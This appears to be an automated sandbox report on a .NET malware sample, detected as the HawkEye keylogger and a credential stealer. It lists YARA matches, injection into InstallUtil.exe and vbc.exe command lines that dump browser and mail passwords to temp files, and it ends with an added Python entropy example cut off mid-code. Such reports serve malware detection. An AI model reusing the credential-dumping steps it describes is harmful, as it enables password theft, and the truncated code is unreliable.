            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 004141D6 appears 88 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00411538 appears 35 times
            Source: ypBoHI5G3x.exe | Binary or memory string: OriginalFilename vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe, 00000001.00000002.448095558.00000000031D1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameRunPe6.dll" vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemailpv.exe< vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamePhulli.exe0 vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe, 00000001.00000002.463314966.000000000768B000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInstallUtil.exeT vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe, 00000001.00000002.460154199.00000000060A0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe, 00000001.00000002.455250431.0000000004128000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSHCore1.dll0 vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe, 00000001.00000002.460808162.0000000006B10000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe, 00000001.00000000.331669031.0000000000C32000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameSchool Store.exe: vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe | Binary or memory string: OriginalFilenameSchool Store.exe: vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 12.2.InstallUtil.exe.7750000.11.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 12.2.InstallUtil.exe.2b6ec2c.6.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 12.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 12.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 12.2.InstallUtil.exe.8110000.12.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 12.2.InstallUtil.exe.2b5b2a0.5.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 12.2.InstallUtil.exe.2b5b2a0.5.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.ypBoHI5G3x.exe.41a1cf2.5.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 1.2.ypBoHI5G3x.exe.41a1cf2.5.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.ypBoHI5G3x.exe.41a1cf2.5.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 12.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 12.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 12.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.ypBoHI5G3x.exe.41a36f7.3.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 1.2.ypBoHI5G3x.exe.41a36f7.3.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 12.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 12.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.ypBoHI5G3x.exe.439c2d7.6.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 1.2.ypBoHI5G3x.exe.439c2d7.6.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.ypBoHI5G3x.exe.439c2d7.6.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.ypBoHI5G3x.exe.439a8d2.7.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 1.2.ypBoHI5G3x.exe.439a8d2.7.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.ypBoHI5G3x.exe.439a8d2.7.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000C.00000002.613574939.0000000008110000.00000004.00000001.sdmp, type: MEMORY | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000C.00000002.612974883.0000000007750000.00000004.00000001.sdmp, type: MEMORY | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
            Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
            Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
            Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.cs | Base64 encoded string: 'kU9AKBYzTfDozk78v7S8AJ4qRIoajat5imvHiMgiRkXdoX1WWUMkcLeIbq0f5Ki+', 'zfWNmoVCmw9cYxvRPzpOe7yARVOHExi6TsOCR63LGMs+Lv0nLSEyXoiEOPiEzRyN', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
            Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@7/5@3/3
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_00415AFD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_00415F87 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_00411EF8 FindResourceW,SizeofResource,LoadResource,LockResource,
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ypBoHI5G3x.exe.log
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | File created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe
            Source: ypBoHI5G3x.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformation
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.493947169.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: ypBoHI5G3x.exeVirustotal: Detection: 28%
            Source: ypBoHI5G3x.exeReversingLabs: Detection: 32%
            Source: unknownProcess created: C:\Users\user\Desktop\ypBoHI5G3x.exe 'C:\Users\user\Desktop\ypBoHI5G3x.exe'
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: ypBoHI5G3x.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: ypBoHI5G3x.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: ypBoHI5G3x.exeStatic file information: File size 1287680 > 1048576
            Source: ypBoHI5G3x.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x139c00
            Source: ypBoHI5G3x.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
            Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.613574939.0000000008110000.00000004.00000001.sdmp
            Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: ypBoHI5G3x.exe, 00000001.00000002.463314966.000000000768B000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599966159.00000000008B2000.00000002.00020000.sdmp, InstallUtil.exe.1.dr
            Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exe
            Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exe
            Source: Binary string: InstallUtil.pdb source: ypBoHI5G3x.exe, 00000001.00000002.463314966.000000000768B000.00000004.00000001.sdmp, InstallUtil.exe, InstallUtil.exe.1.dr

Data Obfuscation:

.NET source code contains potential unpacker
Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_004422C7 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_00C3D0C9 push esi; retf
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_00C3CECD push eax; retf
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_00C3D779 push eax; retf
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_00C3CD10 push ecx; retf
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_00C3D417 push ecx; retf
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_00C3CD9C push esp; retf
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Code function: 1_2_05FF363A push ebx; retf
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 12_2_0516AC12 pushfd ; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_00442871 push ecx; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_00442A90 push eax; ret (2 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_00446E54 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 19_2_00411879 push ecx; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 19_2_004118A0 push eax; ret (2 identical entries)
Source: ypBoHI5G3x.exe, Ra1/Ms7.cs | High entropy of concatenated method names: '.ctor', 'b1T', 'x5B', 'm4G', 'w6N', 'Wb3', 'g8G', 'f6J', 'Rn4', 'Aa5'
Source: ypBoHI5G3x.exe, Wf6/Zk3.cs | High entropy of concatenated method names: '.ctor', 'd6Z', 'w2G', 'j2L', 'k7K', 'At4', 'Mm8', 'Se6', 'Lg5', 'Qe9'
Source: 1.2.ypBoHI5G3x.exe.c30000.0.unpack, Ra1/Ms7.cs | High entropy of concatenated method names: '.ctor', 'b1T', 'x5B', 'm4G', 'w6N', 'Wb3', 'g8G', 'f6J', 'Rn4', 'Aa5'
Source: 1.2.ypBoHI5G3x.exe.c30000.0.unpack, Wf6/Zk3.cs | High entropy of concatenated method names: '.ctor', 'd6Z', 'w2G', 'j2L', 'k7K', 'At4', 'Mm8', 'Se6', 'Lg5', 'Qe9'
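The "High entropy of concatenated method names" hits above are the sandbox applying a simple obfuscation heuristic to the .NET metadata: a class whose methods are named b1T, x5B, m4G and so on has been run through a name obfuscator. As an added example (this editor's code, not part of the Joe Sandbox report and not code from the sample), the following Python recomputes that score on the exact method names listed for Ra1/Ms7 and Wf6/Zk3 and compares it with a constructed control set of ordinary .NET method names. The 4.5-bit entropy threshold and the short-name regex are this example's own assumptions; the sandbox does not publish its criteria on this page.

```python
import math
import re
from collections import Counter

# Method names exactly as listed in the report for the two flagged classes.
REPORTED_NAMES = {
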